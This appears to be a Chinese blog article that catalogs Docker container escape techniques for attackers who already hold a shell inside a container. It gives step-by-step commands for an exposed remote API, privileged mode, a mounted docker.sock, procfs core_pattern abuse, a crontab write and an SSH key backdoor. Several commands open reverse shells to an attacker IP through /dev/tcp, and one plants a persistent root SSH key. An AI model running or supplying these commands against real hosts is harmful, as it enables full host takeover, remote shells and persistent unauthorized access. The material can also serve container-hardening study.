容器-Docker逃逸的各种手法总结！

当涉及到容器技术和应用程序隔离时，Docker是一个被广泛采用的解决方案，其使得应用程序的部署变得更加简单高效。然而，作为攻击者，在实际渗透时，好不容易拿到了一个shell，但是却发现所处的环境在docker容器里面，导致很多常见命令无法执行，这时还是挺难受的。所以，我们对目前网上提到了大部分docker逃逸手法做了汇总复现，希望师傅们在阅读后，碰到此类情况能顺利拿到宿主机的权限。

docker

docker远程API未授权访问逃逸

docker远程api可以执行docker命令，若配置错误将其暴露在公网，攻击者可通过远程调用 Docker API直接管理容器，进而导致逃逸getshell

访问2375端口，如果出现如下页面，即存在docker远程API未授权：

使用如下命令可远程连接docker

sudo docker -H 192.168.111.20:2375 images

通过如下命令可以新运行一个容器，将服务器的根目录挂载至/host目录：

sudo docker -H 192.168.111.20:2375 run -it -v /:/host ubuntu:18.04 /bin/bash

使用chroot 即可实现逃逸到宿主机

chroot /host/

特权模式privileged逃逸

特权模式逃逸 (Privileged Mode Escape) 是容器安全中最经典、最直接，也是危害最大的逃逸方式之一。如果一个容器以--privileged 参数启动，它几乎拥有了和宿主机（Host）一样的权限。攻击者一旦攻入这个容器，就可以利用这些特权轻松“越狱”，控制整个宿主机。

执行如下命令，若CapEff值为0000003fffffffff，则证明为特权模式启动：

cat /proc/self/status | grep CapEff

CapEff: 0000003fffffffff

使用fdisk命令列出系统中所有磁盘设备的分区信息：

fdisk -l

这里可以看到，/dev/sda5是容器内挂载的宿主机磁盘：

在容器内挂载宿主机磁盘：

mkdir /hostmount /dev/sda5 /host

使用chroot /host即可完成逃逸到宿主机：

chroot /host

成功逃逸：

挂载docker.sock逃逸

Docker Socket是Docker守护进程监听的Unix域套接字，如果在攻击者可控的容器内挂载了该套接字文件（/var/run/docker.sock），可通过Docker Socket与Docker守护进程通信，发送命令创建并运行一个新的容器，将宿主机的根目录挂载到新创建的容器内部，实现逃逸。

先创建容器并挂载/var/run/docker.sock文件：

sudo docker -H 192.168.111.20:2375 run -it \ -v /var/run/docker.sock:/var/run/docker.sock \ -v /usr/bin/docker:/usr/bin/docker \ ubuntu:18.04 /bin/bash

检查是否存在/var/run/docker.sock文件：

在容器内部创建一个新的容器，并将宿主机目录挂载到新的容器内部：

docker run -it -v /:/host ubuntu:18.04 /bin/bash

使用chroot /host即可完成逃逸到宿主机：

挂载宿主机procfs逃逸

procfs是Linux系统中的伪文件系统，用于动态反映系统进程和组件状态。当容器挂载宿主机的procfs时，若容器内进程具有足够权限（如root权限且未开启user namespace），攻击者可利用procfs中的敏感文件进行操作。从Linux 2.6.19内核版本开始，若core_pattern文件内容以管道符“|”开头，后续内容将被当作用户空间程序或脚本执行。攻击者可通过修改该文件，使进程崩溃时触发宿主机执行恶意脚本，从而实现逃逸。

使用find命令，如果存在core_pattern文件，则挂载了宿主机的procfs：

find / -name core_pattern

在容器内查看是否能修改 core_pattern：如果显示类似 |/usr/share/apport/apport %p %s %c %d %P %E 则有权限修改，具备逃逸条件

cat /proc/sys/kernel/core_pattern

寻找容器在宿主机上的绝对路径，主要看upperdir的值：

cat /proc/mounts | grep docker

得到路径：

/var/lib/docker/overlay2/d6df2e92d5b1214013dc8758def5dd7becda7b570cf2d79d0562f55368c027c4/diff

在容器根目录下创建脚本 /exp.sh，内容为反弹 Shell：

cat <<EOF > /exp.sh > #!/bin/bash > bash -i >& /dev/tcp/192.168.111.25/9997 0>&1 > EOF

赋予执行权限

chmod +x /exp.sh

将宿主机视角下的脚本路径写入

echo "|/var/lib/docker/overlay2/d6df2e92d5b1214013dc8758def5dd7becda7b570cf2d79d0562f55368c027c4/diff/exp.sh" > /proc/sys/kernel/core_pattern

在攻击机上开启监听：

触发崩溃：

sleep 10 &kill -SIGSEGV $!

成功获取反弹Shell

写入Crontab定时任务逃逸

启动容器时，如果将宿主机的根目录（/）挂载到容器内部的某个目录。由于 Docker 默认以 Root 权限运行，这意味着我们在容器内拥有了对宿主机磁盘文件的全写权限。通过修改宿主机的crontab文件，即可实现从容器到宿主机的控制权转移。

创建一个特权容器并挂载宿主机根目录

sudo docker -H 192.168.111.20:2375 run -it -v /:/host --privileged ubuntu:18.04 /bin/bash

容器内直接向宿主机crontab写入反弹shell命令

echo '* * * * * root bash -i >& /dev/tcp/192.168.111.25/9998 0>&1' >> /host/etc/crontab

攻击机启动一个监听：

nc -lvvp 9998

成功收到shell：

写入ssh公钥逃逸

这个其实跟前面写入定时任务差不多。通过向宿主机的/root/.ssh/authorized_keys写入攻击者的SSH公钥，从而实现免密登录宿主机。

攻击机生成公钥：

ssh-keygen -t rsa -b 4096 -C "backdoor@attacker.com" -f ~/.ssh/docker_escape

查看生成的公钥

cat ~/.ssh/docker_escape.pub

创建.ssh目录

mkdir -p /host/root/.ssh

设置权限（很重要，必须设置对权限）

chmod 700 /host/root/.ssh

写入公钥

cat >> /host/root/.ssh/authorized_keys << 'EOF'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAA... backdoor@attacker.comEOF

设置authorized_keys权限

chmod 600 /host/root/.ssh/authorized_keys

确保所有者正确

chown root:root /host/root/.ssh/authorized_keys

接下来就可以SSH直接连接宿主机了：

ssh root@192.168.111.20